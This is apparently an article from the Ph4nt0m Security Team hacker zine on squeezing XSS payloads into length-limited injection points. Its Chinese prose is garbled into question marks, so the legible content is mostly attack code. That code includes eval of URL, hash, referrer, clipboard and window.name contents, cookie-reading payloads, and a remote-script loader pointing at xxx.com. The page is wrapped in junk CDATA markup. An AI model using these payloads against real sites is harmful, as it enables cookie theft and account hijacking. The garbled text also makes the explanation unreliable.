|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |
==Ph4nt0m Security Team==
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-------------------=[ ???XSS??????????????????JS???? ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By luoluo ]=---------------------------=|
|=----------------------=[ <luoluo#ph4nt0m.org> ]=------------------------=|
|=----------------------=[ <luoluo#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[??]
1. ????
2. ??????
2.1 ????HTML????????????????????????
2.2 ????URL?е?????
2.3 JS???????????
2.4 ???????????????????????????????
2.4.1 document.referrer
2.4.2 ???а?clipboardData
2.4.3 ??????window.name
2.5 ?????????????
3. ???
4. ?ο?
???????
??ЩXSS??????????????????????????Ч???????????????????????YY????????
?????????????????????????????Ч??????????????Ч?????????????????????
??????JS?????????????????о??????????XSS?????????????????????????????
???????????????????????????????????????????????????????????????????Щ
????????μ?XSS?????
????????к?????????????????????????????????п?????????????????
???
??????????
2.1 ????HTML????????????????????????
???????XSS????????HTML????????????????????????????????????JS??????
?????eval????document.write/innerHTML??????и??????????????XSS?????????
??????????????????div????????????????????????????????HTML???????
--code-------------------------------------------------------------------------
<div id="x">????????????</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
????XSS?????????????????????????????????????????XSS??Payload???escape
?????????????????????????????????λ????????XSS????п??????????
--code-------------------------------------------------------------------------
<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
-------------------------------------------------------------------------------
?????28 + len(id)
????x????????????????????????????????????????????JS??????
2.2 ????URL?е?????
????????????????????????HTML?????????????????Щ??????????????????
????????????????URL???????URL??β?????????????е?????????XSS?????
document.URL/location.href????????????????У?????????????80??????????
???
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
?????30
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
?????31
??????????????????????????????????а???????????????JavaScript???
??String??????????????и???????????????????slice??5???????substr????????
?????
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
?????29
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
?????30
?????????а????????????YES?????????MSND???location?????ο??????
?и?hash????????#???????????????????????е???????#???棬??????hash??
???????У??????????????#??????????????slice??????????????????
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
?????29
????????????????????????????????????????????
2.3 JS???????????
??????????????????JS??DHTML??????????????????????????Щ????????????
String.fromCharCode
getElementById
getElementsByTagName
document.write
XMLHTTPRequest
...
??????????????????д??Σ????????????????????????????????????
?????????????????????
--code-------------------------------------------------------------------------
function $(id) {
return document.getElementById(id);
}
-------------------------------------------------------------------------------
??Щ??????????????????????????????????Payload????????????????????????
?????IE??FF???????????ID???????????????Щ???????????????????????????
--code-------------------------------------------------------------------------
function loads(url) {
...
document.body.appendChild(script);
}
<limited_xss_point>loads("http://xxx.com/x");</limited_xss_point>
-------------------------------------------------------------------------------
?????len(??????) + len(url) + 5
??????url???????????????Щ???????????????HTTP????
--code-------------------------------------------------------------------------
function get(url) {
...
return x.responseText;
}
<limited_xss_point>eval(get("http://xxx.com/x"));</limited_xss_point>
-------------------------------------------------------------------------------
?????len(??????) + len(url) + 11
???????????Щ???е?JS?????????????????????????????????????磺
JQuery
YUI
...
????????????????????????JS?????????е?????????????????????????????
??????????????????????????????
2.4 ???????????????????????????????
?????????????????????????????????????????????????????????????
???????????????????Щ??????????洫?????????XSS???????????С?
2.4.1 document.referrer
?????????????????????????????????XSS??棬??????????????url?????
Payload????XSS????????referrer???????????С?
?????????????棺
--code-------------------------------------------------------------------------
http://www.a.com/attack.html?...&alert(document.cookie)
<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
?????34
????????????????Щ??????????location.href????<meta http-equiv=refresh>
??????????????IE??????????ò???referrer????FF??????QZ??????????????
?????????????£????????FF/IE???????????referrer??
--code-------------------------------------------------------------------------
<script type="text/javascript">
<!--
window.onload = function(){
var f = document.createElement("form");
f.setAttribute("method", "get");
f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
document.body.appendChild(f);
f.submit();
};
//-->
</script>
-------------------------------------------------------------------------------
2.4.2 ???а?clipboardData
??????????????????????clipboardData??Payloadд????а壬??????XSS????
?????и??????
????????????棺
--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
</script>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
?????36
?????????????IE??У???????IE 7??????汾??????????а???????
2.4.3 ??????window.name
?????????????????????????о????????????????????????????????????
????????????????????????????
???????о???window.open????????????????????????????????????????????
???????????????target?????????????????????μ???????????????????name????
???????window.open?????????????window.name?????????window?????????????
???name????????????????????????????window.open?????????????????????????
???飬?????????????????????????????????????????????????????д??JS
????VBS??
????????????????????????window.name??????????????name????????????
??????????????????XSS????棬???name???????Payload?????У?
????????????棺
--code-------------------------------------------------------------------------
<script>
window.name = "alert(document.cookie)";
locaton.href = "http://www.xssedsite.com/xssed.php";
</script>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
?????11
?????????????????????????????????IE/FF????????????????????????
????????????????????????????????
window.name??????????????Щ???????÷????????????????????????д???
????????
2.5 ?????????????
?????????????????????????ó?????????????????????Щ???????????
?У?????????????????????????Ч??
???????
JS????????????????????????Щ???????????????????о??У??????ú???
??????????JS???????????????????????????????????????????????????????
?????????
??лaxis*??*???*???硢rayh4c*QZ*??????????????????????
????????????????????????????????
????ο?
http://msdn.microsoft.com/en-us/library/aa155073.aspx
-EOF-
|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |